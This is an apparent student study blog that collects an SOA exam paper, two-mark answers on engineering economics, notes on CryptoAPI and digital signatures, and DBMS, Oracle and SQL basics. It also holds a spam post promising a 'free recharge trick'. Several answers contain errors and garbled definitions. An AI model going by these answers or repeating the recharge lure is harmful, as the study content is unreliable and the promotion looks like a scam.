IT2401 Service Oriented Architecuture question paper for NOV/DEC 2011

1. Define SOA.

2. How do components in an SOA inter-relate?

3. What are Wrapper Services?

4. Compare Abstract and Concrete description.

5. List the Goals of service-oriented analysis.

6. What is the usage of Envelope element in SOAP message structures?

7. What is Message Processing Logic?

8. What are Dynamic proxy and dynamic invocation interface?

9. How are the switch, case, and otherwise elements used in WS-BPEL?

10. What are Policy element and common policy assertions?

PART B — (5 × 16 = 80 marks)

11. (a) Explain the Common Principles of Service Orientation in detail.

Or

(b) Compare SOA to Client-Server and Distributed Architecture.

12. (a) Discuss about three Service Layers in detail.

Or

(b) (i) Explain the importance of messaging with SOAP and message exchange patterns in web services. (5 + 5)

(ii) Write a note on Atomic Transactions. (6)

13. (a) Discuss the step by step process of Service modeling in detail.

Or

(b) Explain Entity-Centric and Task-Centric business Service design in detail.

14. (a) Explain SOA platform and describe the APIs in J2EE which is used to built SOA.

Or

(b) How is Service Oriented Architecture achieved in .NET platform? Discuss.

15. (a) Describe Root element and Series of Common child element of WS-BPEL Process definition.

Or

(b) Discuss WS-Security Language in detail.

Read More

Engineering Economics & Financial Accounting MG2452: 2 Marks

TWO MARK QUESTIONS AND ANSWERS

UNIT – I

INTRODUCTION

1. Define Managerial Economics

 By combining the basic definition of the two terms “Manager” and “Economics” you get the definition of “managerial economics” . “Managerial Economics” is the study of directing resources in a way that it most efficiently achieves the managerial goals.

 Managerial Economics is also the application of the tools of economics analysis in decision making in actual business situations.

2. What is meant by Micro economic analysis?

 Micro economic analysis deals with the problems of an individual firm, industry or consumer etc. It helps in dealing with issues which go on within the firm such as putting the resources available with the firm to its best use, allocating resources within various activities of the firm to its best use, allocating resources within various activities of the firm and also deals with being technically and economically efficient.

3. What is meant by Prescriptive approach?

 Prescriptive or normative approach tells “How things ought to be done”.

4. What is meant by descriptive approach?

 Descriptive approach tells “how things are done”.

5. Scope of Managerial Economics:

 The following aspects constitute the scope of managerial economics:

1. Objectives of a business firm

2. Demand analysis and forecasting

3. Cost analysis

4. Production management

5. Supply analysis

6. Pricing decisions, policies and practices

7. Profit management

8. Capital budgeting and investment decisions

9. Decision theory under uncertainty

10. Competition

6. Give the Objectives of a business firm

The objectives of a business firm may be varied. Apart from generating profits a firm has many other objectives like being a market leader, being a cost leader, achieving superior efficiency, achieving superior quality, achieving superior customer responsiveness etc.

7. What is meant by Supply Analysis?

 Supply analysis deals with the various aspects of supply of a commodity. Certain important aspects of supply analysis are supply schedule, curves and function, elasticity of supply, law of supply and its limitations and factors influencing supply.

8. What is meant by Capital Budgeting?

 Capital budget is the planning of expenditure on assets.

9. Use of Engineering Economics:

 Engineering economics accomplishes several objectives. It presents the aspects of traditional economics that are relevant for business and engineering decision making in real life.

10. Define Logistics:

 It is the movement of goods from one place to the other.

11. Define Inbound Logistics:

 It is the movement of raw materials to the factory premises.

12. Define outbound logistics:

 It is the movement of finished goods to wholesaler or retail outlets and to the final consumers.

13. Define Statistics:

 Statistics provide the basis for empirical testing of theory. Generalizations or theory cannot be accepted for practice unless these theories are checked against the data from the reality. This way, theories become more practical and useful in real life business situation.

14. Define Economics and define the divisions of Economics:

 Economics has two division’s namely micro economics and macro economics. Micro economics is the branch of economics where the unit of study is an individual or a firm while macro economics is branch of economics where the unit of study is aggregative in character and considers the entire economy.

15. Define Accounting:

 Accounting can be defined as the recording of financial operations of an organization. Managerial decisions on profits and sales etc. derive input largely from the accounting statement of a firm.

16. Define Managerial Economics and Mathematics:

 Many of the theories in mathematics will find use in economics. Concepts such as calculus, vectors, logarithms and exponentials, determinants and matrix, algebra etc are some to name a few. Managerial economics is metrical in character. It estimates various economic relationships prediction relevant economic quantities and uses them in decision making and planning for the future. So mathematics becomes an important tool in managerial economics.

17. Define Operations research:

 Operations research was developed as science during the Second World War to solve the complex operations problems of planning and resource allocation in defense and in basic industries which specifically supplied military equipments. These theories find high usage in various field of management to solve problems pertaining to logistics, both inbound and outbound and also the movement of material within the factory premises etc.

18. Define a competitor.

The competitors of the firm are also likely to react or even pro-act to any decisions made by the firm. Competitors always try to navigate the competitive advantage gained by the firm. Thus managers will have to make wise investments in projects that will be hard to be imitated by the competition.

19. Define Decision theory under uncertainty:

 Most of the business decisions taken by the managers are done under uncertainty. Uncertainties pertaining to demand, cost, price, profit, capital etc prevail most of the time when decisions are made. This makes the whole decision making process difficult and complex. The tools used in economic analysis have been modified and refined so as to take into account the uncertainty and thus help decisions making in logical and scientific manner.

20. Define Profit Management:

 All business firms are motivated and committed to produce profits. Profits are one of the tangible yardsticks to measure the performance of the firm and the managers concerned. It also signifies the health of the firm. Profits are influenced by various factors such as cost of production, revenues and other factors both internal and external to the firm. Profits are hard to predict.

21. Define Pricing Decisions

 A firm’s profitability and success greatly depend on the pricing decisions and the pricing policies of the firm. The patronization of the firm’s products by the customers, the competition faced by the product along with the profits of the firm, largely depends on the price of the product. Pricing also depends on the environment in which the firm operates, competitions, customers etc.

22. Define Production Management:

 When a manager organizes and plans the firm’s production functions i.e. when he tries to convert the raw materials to finished product, he faces a number of economic problems. The study of ‘production function’ describes the input output relationship.

23. Define Cost Analysis:

 One way to earn higher profits is by controlling the cost involved in producing the product. Study of cost is necessary for making efficient and effective managerial decisions. If a detailed cost analysis and estimation is done, the firm can move upon effective profit management and sound pricing practices.

24. What are the Macro economic Conditions?

(a) The economy in which firms operate is predominantly a free enterprise economy.

(b) The present day economy is undergoing rapid technological and economic changes and,

(c) The government intervening in the economic affairs has increased in the recent times and is likely to go up further.


25. What are the Common points in Managerial Economics?

1. Managerial economics deals with the decision making by managers, executives and engineers of economic nature.

2. Managerial economics is goal oriented.

3. Managerial Economics is both conceptual and metrical.

4. Managerial economics is pragmatic.

UNIT – II

DEMAND AND SUPPLY ANALYSIS

1. Define Demand.

 Demand indicates the quantities of products (goods service) which the firm is willing and financially able to purchase at various prices, holding other factors constant.

2. Define Determinants of Demand:

 An individual’s demand for a commodity depends on his desire and capability to purchase it. Apart from the desire to purchase, there are many other factors which influence the purchase of a product (demand). These are known as demand determinants.

3. What is meant by Tastes and preferences of Consumers?

 The change of tastes and preferences of consumers in favor of a commodity will result in a greater demand for the commodity. The opposite also holds good i.e. if the tastes and preferences of consumer change against the commodity, the demand will suffer.

4. What are the two kinds of Consumers expectations?

 Consumers have two kinds of expectations one pertains to their future income and the second is related to the future prices of the goods and its related goods.

5. Define Advertising

 Advertisements provide information about the presence of quality products in the market and induce customers to buy more. It also promotes the latest preferences of the general public to masses.

6. Define the Law of Demand:

 The relation of price to quantity demanded / sales is known as the law of demand. Law of demand states that the higher the price is the lower the demand is and vice versa, holding other factors as constant.

7. Define the price quantity relation.

 This price quantity relation can be expressed as demand being a function of price

 D=f (p).

8. What Highlights of the law of demand:

1. The relationship between price and quantity demanded is inverse.

2. Price is the independent variable and demands the dependent variable.

3. Law of demand assumes that except for price and demand, other factors remain constant.

9. What is Demand Shift: (Change in demand?)

 Factors shift the demand for a particular product either on the right side of the demand curve or to the left side of the demand curve based on the changes in price. These factors, other than the price of a good that influence demand are known as demand shifters. The shift in the demand either to the left or right is called the demand shift.

10. What are the Exceptions to law of demand?

1. In share markets on would have noticed that the rise in price of the shares increases, the sales of the shares while decrease in the price of the shares results in decrease of sale of the shares.

2. Some goods which act as status symbol and have a snob appeal fall under this category. Here when the price of the product raises then the appeal of the product also rises and thus the demand. Some example is diamonds and antiques.

3. Finally, ignorance on the part of the consumer may cause the consumer to buy at a higher price, especially when the rise in price is taken to mean an improvement in quality and a reduction in price as deterioration in quality.

11. Define Individual demand:

 The quantity of a product demanded by an individual purchaser at a given price is known as individual demand.

12. Define Market demand:

 The total quantity demanded by all the purchasers together is known as the market demand.

13. What are the types of Demand Function?

1. Consumption function

2. Product consumption function

3. Differences in regional incomes

4. Income expectation and demand

14. What are the Characteristics of demand function?

1. The long run relationship between consumption and income is some what stable, and expenditure on consumption is usually about 85 to 90% of the income.

2. The consumption function is highly unstable in short runs and the relationship between income and consumption cannot be predicted by any mathematical formula.

3. During the periods of economic prosperity, there is an absolute increase in the expenditure on consumption, but decrease as a percentage of income during periods of depression, the consumption declines absolutely but the expenditure on the consumption increases as a percentage of income.

4. In the periods of economic recovery, the rate of increase in consumption is higher than the rate of the decline in consumption in times of recession.

15. Define Product consumption function:

 This function can be defined as the relationship between the total income of the consumer and sales of particular products. It means that when there is a change in income there is a change in the demand for particular products.

16. Define Income expectations and Demand:

 Expectations are related to people’s estimates of the level and durability of the future economic conditions. The demand for many consumer durables (household appliances like TV, Washing machine, etc) is often sensitive to general expectations regarding income level.

17. What are the features of advertising demand relationship?

1. Even when there is no advertising effort done, there will be a certain amount of sales possible for a particular product by virtue of its presence in the market.

2. There is a direct relationship between advertising and sales. Thus when there is an increased spending on advertisements. It will bring in more sales.

3. Increase in advertisements will lead to more than proportionate increase in sales only to a point. After that any increase in advertisement will have only less than proportionate effect on sales.


18. Define Elasticity of Demand?

 Elasticity of demand is defined as ‘the percentage change in quantity demanded caused by one percent change in the demand determinant under consideration, while other determinants are held constant’.

19. Define demand determinant

 It is the degree of change in demand to the degree of change in any of the demand determinants.

20.What are the Various Elasticities ?

 1. Price elasticity of demand

2. Income elasticity of demand

3. Cross elasticity of demand

4. Promotional elasticity

5. Exportations elasticity of demand

21. Define Price Elasticity of Demand

 Price elasticity of demand can be defined as “the degree of responsiveness of quantity demanded to a change in price”.

22. What are the Types of price elasticity:

1. Perfectly elastic demand

2. Absolutely inelastic demand or perfectly inelastic demand

3. Unit elasticity of demand

4. Relatively elastic demand

5. Relatively inelastic demand

23. Define absolutely inelastic demand or perfectly inelastic demand (ep=):

 Absolutely inelastic demand is where a change in price howsoever large, causes no change in the quantity demanded of a product. Here, the shape of the demand curve is vertical.

24.Define Relatively elastic demand (ep>1):

 It is where a reduction in price leads to more than proportionate change in demand. Here the shape of the demand curve in flat.

25.What are theFactors determining price elasticity of Demand ?

 The elasticity of demand depends on the following factors namely

1. Nature of the product

2. Extent of usage

3. Availability of substitutes

4. Income level of people

5. Proportion of the income spent of the product

6. Urgency of demand and

7. Durability of a product.


UNIT III

1. Say some of the main cost concepts.

1) Actual costs and opportunity costs

2) Incremental costs and sunk costs

3) Explicit costs and implicit costs

4) Past costs and future costs

5) Accounting costs and economic costs

6) Direct cost and indirect cost

7) Private costs and social costs

8) Controllable costs and non controllable costs

9) Replacement costs and original costs

10) Shutdown costs and abandonment costs

11) Urgent costs and postponable costs

12) Bussiness costs and full sosts

13) Fixed costs and variable costs

14) Short run and long run costs

15) Incremental costs and marginal costs

2. What are actual costs and opportunity costs ?

 Actual costs which a firm incurs for producing or acquiring a product or a service. As example for this is the cost on raw materials, labor, rent, interest.

3. What are incremental costs and sunk costs ?

Incremental cost is the additional cost due to change in the level of nature or business activity. Sunk costs are the costs that are not altered by a change in quantity produced and cannot be recovered.

4. What are Explicit costs and implicit costs ?

Explicit or paid out costs are those expenses which are actually paid by the firm. Implicit costs are the theoretical costs in the sense that they go unrecognized by the accounting system.

5. What are past costs and future costs ?

Past costs are the actual costs incurred in the past are generally contained in the financial accounts. Future costs are costs that are expected to occur in some future period or periods.

6. What are accounting costs and economic costs ?

Accounting costs are the actual outlay costs. Economic cost relate to the future,

7. What is direct and indirect cost ?

Direct cost are traceable cost or assignable cost are the ones that have direct relationship with a unit of operation like a product, a process or a product, or a department of the firm. On the otherhand, indirect costs or non traceable costs or common or non assignable costs are the costs whose course cannot be easily and definitely traced to the plant.

8. What are private costs and social costs ?

Private costs are those which are actually incurred or provided for the business activity by an individual or the business firm. Social costs on the otherhand are the total costs to the society on account of production of a good.

9. What are controllable and non controllable costs ?

Controllable costs are those which are capable of being controlled or regulated by the managers ant = d it can be used to assess the managerial efficiency in controlling the cost in his department. Non controllable costs are those which cannot be subjected to administrative controls and supervision.

10. What are replacement costs and original costs ?

Original costs or the historical costs are the costs paid for assets such as land, building, cost of plant, equipment and materials. Replacement costs are the costs that the firm incurs if it wants to replace or acquire the same assets now.

11. What is shut down cost and abandonment cost ?

Shutdown costs are costs in which the firm incurs if it temporarily stop its operation. Abandonment costs are the costs of retiring altogether a fixed asset from use.

16)what are incremental cost and marginal cost?

 Incremental cost is important when dealing with decisions where discrete alternatives are to be compared.marginal cost deals with unity unit output.

17)what are the determinants of cost?

 1) level of output

 2) price of inputs.

 3) size of plant

 4) output stability

 5) production lot size

 6)level of capability utilization

 7) technology

 8) learning effect

 9) breadth of product range.

 10) geographical location

18) what are the two aspects in cost output relationships?

 1) cost output relationship in short run.

 2)cost output relationship in long run.

19) what are the terms involved in cost output relationship?

 1) Average fixed cost.

 2) Average variable cost.

 3) Average total cost.

20) what is level of capacity utilization?

 The higher the capacity utilization fixed cost per unit of output in bound to be low.

21) what is output stability?

 Stability of output leads to savings in various kinds of hidden cost interruption and learning.

22)what is size of plants?

 Production costs are usually lower in bigger plants than smaller plants.

23)what is cost?

 Cost is the money spent on producing and selling a product to the customers.the cost of a product starts from the raw materials through production costs till selling costs include the cost in maintaining outlets.

24)what is the significance of cost in managerial decision making?

 Study of costs is essential for making a choice from among the competing production plans. production decisions are not possible without their respective cost considerations.

25)what is price of input?

 If the price of the raw materials labor, power increases then naturally the cost of production goes up.this cost of productions varies directly with the prices of inputs.

 UNIT-IV

1) what are the two factors in pricing strategies?

 1) external factors

 2) internal factors

 2)what are the external factors in pricing strategies?

 i. The competition in the market

 ii. The elasticity of supply and demand

iii. Trends of the market

iv. purchasing power of buyers.

 v. government policies towards prices.

3)what are the two factors in pricing strategies?

 1) The costs

 2) Management policy towards the gross margin and the sales turnover

4)what are the determinants?

 1)objectives of business

 2)competition

 3)product and promotional strategies

 4)Nature of price sensitivity

 5)influence of middle men

 6)Routinisation of pricing

 7)Government regulation

5)What is objectives of business?

 The fundamental objective of a firm is to survive in the business and then thrive.The pricing strategy adopted by a firm is very much by these factors.

6)what is competition in pricing strategy?

 To come out with a pricing policy that will be advantages to the firm,managers require a perfect understanding of the competitive environment in which the firm is placed.

7)what are product and promotional strategies?

 i. product itself

 ii. pricing

 iii. promotion activities

 iv. distribution of products through the channel to the consumer.

8)what is nature of price sensitivity?

 We know that many factors contribute to the increase of price sensitivity,but managers should not ignore the factors that minimize price sensitivity .when designing pricing strategies.

9)what is influence of middlemen?

Middlemen are the ones who stock the finished product of the manufacturer to sell it to the customers.these are also called the channel for distribution.

10) What is routinization of price?

 This strategy of pricing relies on the tried and trusted pricing strategies which the organization has followed all along. This pricing practice is often routinized but the extend varies from company to company and from product to product.

11) What is the government regulation in pricing?

 Inorder to safeguard the interests of the public the government acts on their behalf to prevent the abuse of the monopolistic power and collusion among business.

12) Say some of the objectives of the pricing policy?

 i. profit maximization.

 ii. long term welfare of the firm.

 iii. facing competition.

 iv. flexibility to economic changes.

 v. satisfying rate of returns.

13) What are the cost oriented pricing method?

 i. cost plus pricing or full cost pricing.

 ii.marginal cost pricing or incremental or direct cost pricing.

 iii.target pricing or rate pricing.

 iv. programme pricing.

14) What are the competition oriented pricing method?

i.going rate pricing.

ii.loss reader pricing.

iii.customery pricing.

iv.price leadership pricing.

v.trade association pricing.

vi.cyclical pricing.

vii.imitative pricing.

viii.turnover pricing.

15) What are the praising based methods?

 i.administered pricing.

 ii.dual pricing.

 iii.price discrimination or differential pricing.

16) What are cost oriented pricing methods?

i) cost plus.

ii) marginal cost pricing.

iii) target pricing.

17) What is going rate pricing method?

In going rate pricing the emphasis is on the market situation unlike the full cost pricing where the emphasis was on costs.

18) What is leadership pricing method?

 The pricing strategy is widely used in retailing buiness. Because the names has the word loss in it this policy may be confused with the pricing which results in losses.

19) What is customary pricing method?

 In case of some products their prices get more or less. This does not happen due to deliberate action on the seller’s part but it happens as the results of the product prevailing in the market for a long period of time.

20)  What is price leadership method?

 In any industry, out of all the firms operating industry, atleast one firm will have its cost of production lower than all other firms.

21)  What is trade association pricing method?

 The kind of pricing arises out of an unsaid understanding agreement between the firms operating in the market.

22) What is the cycling pricing method?

 The pricing method which is done to capitalize on the cycles of the season in nature and the cycle in the economy are known as cyclical pricing.

23) What is imitative pricing method?

 It is very similar to the loss leader pricing method. This pricing policy is often used in retail business.

24) What is turnover pricing method?

 Turnover is the word which denotes the sales of the product. The higher the turnover means higher the sales.

25) What is dual pricing method?

 Usually the firms which produce essential commodities have part of their product under administrating pricing and part of the product is solid in the free market.

26) What is price?

 Price is the source of revenue for the firm and it decides the health of the firm.the customer acceptance or rejection of a product is most of the time predominantly influenced by price.

27) What are the external factors influencing the précising decision?

 i.the ccompetition in the market.

 ii.the elasticity of supply and demand.

 iii.trends of the market.

 iv.purchasing power of buyers.

 v.government policies towards prices.


UNIT-V


1) What is balanced sheet?

 The balanced sheet provides the financial position of a company at any given point of time.

2) Say some of the important financial statements?

 i.profit and loss account.

 ii.balance sheet.

 iv.fund flow statement.

3) What are the contents of a balance sheet?

i.assets

ii.liabilities.

4) Say some of the types of assets?

 i.fixed assets.

 ii.investments.

 iii.current assets.

 iv.loans and advances.

 v.miscallaneous expenditure

5) What is fixed assets?

 Their life period is very long, these are purchased for carrying out the operation in a company. Using this the company can generating revenue.

6) What is investment?

 The long term and short term financial securities owned by a company comes under this category. Here lomg term investments means buying shares of the other companies.

7) What is current assets?

 Any asset that can be converted into cash within one year of time is called as current asset. They would be converted into cash at the end of the operating cycle of a firm.

8) What are the items come under this current assets?

 i.cash.

 ii.debtors.

 iii.inventories.

9) What is loans and advances?

 It is the amont that a company loans to its employees, advances given to supplies, government contractors and other agencies it is also include prepaid expenses.

10) What are the types of liabilities?

 i.share capital.

 ii.resreves and surpluses.

 iii.secured loans.

 iv.unsecured loans.

 v.current liabilities.

11) What is meant by share capital?

 It includes both equity share capital and preference share capital. Equity share holders are the owners of a company they take risk and their dividend is not fixed but is case of preference share capital the dividend rate is fixed.

12) What is meant by Reserves and Surpluses?

 It is nothing but the profit that is retained by accompany not by not paying it as dividend to the shareholders.

13) What are the types of reserves ?

 i.revenue reserve.

 ii.caapital reserve.

14) What is meant by secured loans?

 Loan amount borrowed by the firm by pledging assets (ie) securities are provided for these loans.

15) What is meant by unsecured loans?

 In this case nosecurity is provided examples are fixed deposits, loans and advances.

16) What is meant by current liabilities?

 This consists of amount that is to the suppliers when goods are purchased on a credit basis, advance payments received accured expenses, provisions for tax.

17) What is meant by income statement?

 The companies act does not any particular way in which the profit and loss account or the income statement has to be prepared. This statement reflects the performance of a company over a period of time.

18) Who are all the users of financial statement?

 i.management.

 ii.shareholders, investors, anlyst.

 iii.lenders

 iv.suppliers.

 v.customers.

 vi.employees.

 vii.government and regularity agencies.

 viii.others

19) What is meant by cash flow statement?

 A firm would enter into trouble if it spends more cash than it is able to generate. The firm should generate adequate capital for it survival.

20) How the cash flow of a business can be classified?

 a. operating activities

 b. investing activities

 c. financing activities

21)what is meant by ratio analysis?

 It is one of the powerful tool for financial statement analysis. Ratio is nothing but the relationship between two or more items.

22) What are the different ways of carrying out analysis?

 a. past ratio

 b. competitors ratio

 c. industrial ratio

 d. projected ratio

23) What is meant by past ratio?

 The current financial years ratios can be compared with the previous years ratio to find whether the financial position has improved over the years or not.

24) What is meant by competitor’s ratio?

 The ratio of a company can be compared with the ratio of the competitors and with the market leader.

25) What is meant by industry ratio?

 The ratios of a firm can be compared with the ratios of the industry to which the particular firm belongs to.

Read More

Key Databases

Each cryptographic service provider (CSP) has a key database in which it stores persistent cryptographic keys. Each key database contains one or more key containers, each of which contains all the key pairs belonging to a specific user. The following illustration showsthe relationship between CSPs, key databases, and key containers.

The CSP stores each key container from session to session, including all of the public/private key pairs that it contains. However, session keys are not automatically persisted to any permanent storage media.
Generally, a default key container is created for each user. Default key containers have a default name.
An application can create its own key container and key pairs, and assign a name to the key container. A key is created for each user and each machine. For each user, the key container is located in the HKEY_CURRENT_USER\Comm\Security\Crypto registry key. For each machine, the key container is located in the HKEY_LOCAL_MACHINE\Comm\Security\Crypto registry key.
CryptoAPI encrypts the contents of the key container using the CryptProtectData function. Note that all applications can read and decrypt both user and machine keys by calling CryptUnprotectData on the encrypted key contents.

Read More

Hashing and Digital Signature Algorithms

This section lists several algorithms used to compute hashes and digital signatures. Each of these algorithms is supported by the Microsoft RSA Base Provider.
The MD2, MD4, and MD5 hashing algorithms were all developed by RSA Data Security, Inc. These algorithms were developed in sequential order. The later algorithms are generally more secure than the earlier ones. All three algorithms generate 128-bit hash values.
The secure hashing algorithm (SHA) was developed by the National Institute of Standards and Technology (NIST) and by the National Security Agency (NSA). This algorithm was developed for use with digital signature algorithm (DSA) or Digital Signature Standard (DSS). This algorithm generates a 160-bit hash value.
Message authentication codes are similar to hash values, but are computed using a session key. Because of this, you must possess the session key to recompute the hash value to verify that the base data has not changed.
The message authentication codes implemented by the Microsoft RSA Base Provider are of the most common sort. That is, they are block cipher message authentication codes. This method encodes the base data with a block cipher and then uses the last encoded block as the hash value. The encryption algorithm used to build the Message Authentication Code is the one that was specified when the session key was created.

Read More

Digital SIgnature

What is a Digital Signature? An introduction to Digital Signatures, by David Youd

---

Bob

(Bob's public key) (Bob's private key)

Bob has been given two keys. One of Bob's keys is called a Public Key, the other is called a Private Key.

Bob's Co-workers:
				Anyone can get Bob's Public Key, but Bob keeps his Private Key to himself
Pat	Doug	Susan

Bob's Public key is available to anyone who needs it, but he keeps his Private Key to himself. Keys are used to encrypt information. Encrypting information means "scrambling it up", so that only a person with the appropriate key can make it readable again. Either one of Bob's two keys can encrypt data, and the other key can decrypt that data.
Susan (shown below) can encrypt a message using Bob's Public Key. Bob uses his Private Key to decrypt the message. Any of Bob's coworkers might have access to the message Susan encrypted, but without Bob's Private Key, the data is worthless.

"Hey Bob, how about lunch at Taco Bell. I hear they have free refills!"

HNFmsEm6Un BejhhyCGKOK JUxhiygSBCEiC 0QYIh/Hn3xgiK BcyLK1UcYiY lxx2lCFHDC/A

HNFmsEm6Un BejhhyCGKOK JUxhiygSBCEiC 0QYIh/Hn3xgiK BcyLK1UcYiY lxx2lCFHDC/A

"Hey Bob, how about lunch at Taco Bell. I hear they have free refills!"

With his private key and the right software, Bob can put digital signatures on documents and other data. A digital signature is a "stamp" Bob places on the data which is unique to Bob, and is very difficult to forge. In addition, the signature assures that any changes made to the data that has been signed can not go undetected.

To sign a document, Bob's software will crunch down the data into just a few lines by a process called "hashing". These few lines are called a message digest. (It is not possible to change a message digest back into the original data from which it was created.)

Bob's software then encrypts the message digest with his private key. The result is the digital signature.

Finally, Bob's software appends the digital signature to document. All of the data that was hashed has been signed.

Bob now passes the document on to Pat.

First, Pat's software decrypts the signature (using Bob's public key) changing it back into a message digest. If this worked, then it proves that Bob signed the document, because only Bob has his private key. Pat's software then hashes the document data into a message digest. If the message digest is the same as the message digest created when the signature was decrypted, then Pat knows that the signed data has not been changed.

Plot complication...

Doug (our disgruntled employee) wishes to deceive Pat. Doug makes sure that Pat receives a signed message and a public key that appears to belong to Bob. Unbeknownst to Pat, Doug deceitfully sent a key pair he created using Bob's name. Short of receiving Bob's public key from him in person, how can Pat be sure that Bob's public key is authentic?

It just so happens that Susan works at the company's certificate authority center. Susan can create a digital certificate for Bob simply by signing Bob's public key as well as some information about Bob.

Bob Info:     Name     Department     Cubical Number Certificate Info:     Expiration Date     Serial Number Bob's Public Key:

Now Bob's co-workers can check Bob's trusted certificate to make sure that his public key truly belongs to him. In fact, no one at Bob's company accepts a signature for which there does not exist a certificate generated by Susan. This gives Susan the power to revoke signatures if private keys are compromised, or no longer needed. There are even more widely accepted certificate authorities that certify Susan.
Let's say that Bob sends a signed document to Pat. To verify the signature on the document, Pat's software first uses Susan's (the certificate authority's) public key to check the signature on Bob's certificate. Successful de-encryption of the certificate proves that Susan created it. After the certificate is de-encrypted, Pat's software can check if Bob is in good standing with the certificate authority and that all of the certificate information concerning Bob's identity has not been altered.
Pat's software then takes Bob's public key from the certificate and uses it to check Bob's signature. If Bob's public key de-encrypts the signature successfully, then Pat is assured that the signature was created using Bob's private key, for Susan has certified the matching public key. And of course, if the signature is valid, then we know that Doug didn't try to change the signed content.

Although these steps may sound complicated, they are all handled behind the scenes by Pat's user-friendly software. To verify a signature, Pat need only click on it. 

---

Read More

Free Recharge for Airtel,Tata Docomo,idea,vodafone,aircel,Bsnl....etc

hi friends here i published free recharge trick this is work in all over india

Plz do some simple step and get recharge on ur mobile

Click here to enter the trick

Read More

DATA BASE MANAGEMENT SYSYTEM(DBMS)

WHAT IS DATA?
Data is the name given to facts or entities such as names and numbers. e.g.  Weight, prices, marks etc.

WHAT IS INFORMATION?
Information is the data that has been covered into more useful forms.

WHAT IS DATABASE?
A database can be defined as a collection of coherent, meaningful data (information) or database is the facts or information placed in an organized form.

Without any organization information has no meanings.

A database is an organized collection of data that is useful to us. The data inside in a database can be modified, deleted or new data can be added. They are stored in the form of records as shown in the table below:

EMP_ID	EMP_NAME	AGE	SALARY
1101	SIMRAN	21	22000

The above table shows a single record. The columns-Emp_id, Emp_Name, Age, Salary are the fields or attributes, while the row containing the corresponding the values-1101, Ana, 28, 15000 is a single record. There can be a number of records in a table and number of tables in a database. The tables in a database are related to each other through one/more attributes/fields.

Database is of two types:
1.    Manual databases: Databases created by human beings without any support of computer is known as manual databases.
2.    Computer based databases: Databases created with the help of computer are known as computer based databases.

Computer based databases are of two types:

A. Tradition files processing system
B. Database approach

What Is DBMS?
It stands for database management system. It is a software system that allows the users to define, create and manipulate database and provides a control to the database.

Components of DBMS:
1.    Hardware
2.    Software
3.    Data
4.    Procedures
5.    Users
Advantages of DBMS:
1.    Controlling Redundancy: In file system, each application has its own private files, which can’t be shared between multiple applications. This can often lead to considerable redundancy in the stored data, which results in wastage of storage space. In DBMS by having centralized database this can be avoided.
2.    Integrity can be enforced: Integrity of data means that data in database is always accurate, such that inaccurate information cannot be stored in database.
3.    Standards can be enforced: Since DBMS is a central system, so standard can be enforced easily may be at company level, department level, national level or international level.
4.    Inconsistency can be avoided: When the same data is duplicated and changes are made at one site, which is not propagated to the other site, it gives rise to inconsistency and the two entries regarding the same data will not agree. At such time the data is said to be inconsistent. So if redundancy is removed chances of having inconsistent data is also removed.
5.    Data can be shared: DBMS is a centralized system in which data can be shared by multiple applications.
Disadvantages of DBMS:
1. Complexity: The provision of the functionality that is expected of a good DBMS makes the DBMS an extremely complex piece of software.
2. Size: The complexity and breadth of functionality makes the DBMS an extremely large piece of software, occupying many megabytes of disk space and requiring substantial amount of memory to run efficiently.   
3.  Performance: Performance is slow as compared to file processing system.
4. Higher impact of failure: In DBMS system failure of any component can bring operations to a halt.
5. Cost: Cost of DBMS is very high. It varies significantly, depending on the environment and functionality provided.

Read More

Oracle

INTRODUCTION TO ORACLE

click here to get free recharge on ur mobile  

A relational model, made by Dr. E.F Codd in 1970, sponsored by IBM, accepted as definitive model for RDBMS. This language developed by IBM to manipulate the data stored within Codd’s model was originally called Structured English Query Language(SEQUAL) with the word English later being dropped in favor Structured Query Language(SQL).

In 1979 a company called Relation Software, Inc. released the first commercially available implementation of SQL. Relation Software later came to be known as Oracle Corporation. Oracle corporation is a company that produces the most widely used, Server based, Multi user RDBMS named Oracle.

FEATURES OF ORACLE:

1.    Very Large Memory Support:

Oracle allows Very Large Memory (VLM) configuration in Window 2000 and Window XP, which allows Oracle to access more than 4GB RAM.

2.    4GB RAM TUNING(4GT):

Window NT Server Enterprise and Datacenter Editions include a feature called 4GB RAM TUNING(4GT).This feature allows memory-intensive applications running on Oracle

3.    VLM INSTANCE TUNING:

VLM configuration improves database performance by caching more database buffers in memory.

4.    USER MIGRATION UTILITY:

A new command-line tool, User Migration Utility, simplifies conversion of local or external database users to enterprise users.

5.    ORACLE SHARED SERVER PROCESS:

It is a server configuration which allows many user processes to share very few server processes. The user processes connect to a dispatcher background process, which routes client requests to the next available shared server process.

6.    ORACLE NET MULTIPLEXING AND CONNECTION POOLING:

Oracle net multiplexing and connection pooling features allow a large configuration to connect more users to a single database instance.

7.    ORACLE REAL APPLICATION CLUSTERS:

This clusters raises connection counts dramatically by allowing multiple server computers to access the same database files, increasing the number of user connections by tens of thousands, as well as increasing throughput

Read More

DBMS SQL Queries

Command: Create

Purpose: This command is used to create tables.

Syntax: Create table <table name> (column 1 data type<size>, column 2 data type <size>);

Example::SQL> create table student2(s_no varchar2(4), name char(15), roll_no varchar2(6), branch char(10));
 

Command: Desc

Purpose: This command is used to describe table.

Syntax: desc <table name>;

Example::
SQL> desc student2;
Name Null? Type
  Command: Insert

Purpose: This command inserts values in the table.

Syntax: Insert into table name (col name 1, column name 2) values (value1, value2);

Example::
SQL> insert into student2 values (1,'AMAN', 7213,'c.s.e.');

SQL> insert into student2 values (2,'ANKIT’, 7216,'c.s.e.');

SQL> insert into student2 (s_no,name,branch) values(3,' ADITYA',7206,'c.s.e.');
  Command: Select

Purpose: Selects all columns and rows from table,* and distinct are the options used with it.

Syntax: Select [distinct] <tablename.columnname>
From<tablename>
[Where <condition>]
[Group by<columnname(s)>]
[Having <condition>]
[Order by <expression>];

Example::
SQL> select * from student2;

SQL> select * from student2 where name='ANKIT';

SQL> select * from student2 where s_no=3;
  Command: Alter

Purpose: This is used to modify the structure of the table.

Syntax: Alter table name add<new column datatype<size>;

Example::
SQL> alter table student2 add( address varchar2(25));

SQL> select * from student2;

SQL> alter table student2 modify( address varchar(28));

SQL> alter table student2 drop(address);

SQL> select * from student2;
  Command: Delete

Purpose: This command is used to delete all the rows or either a set of rows from a table.

Syntax: Delete from <table name>;
Delete from <table name> where <condition>;

Example::
SQL> delete from student2 where name='purneet';

SQL> select * from student2;

SQL> delete from student2;

SQL> select * from student2;
  Command: Update

Purpose: This command is used to change and modify the data values in a table.

Syntax:Update <table name>set<column name1>=<expresson1>, < column name2>=<expresson2>;

Example::
SQL> update student2 set name='AKSHAY' where s_no=3;

SQL> select * from student2;
  Command: Rename

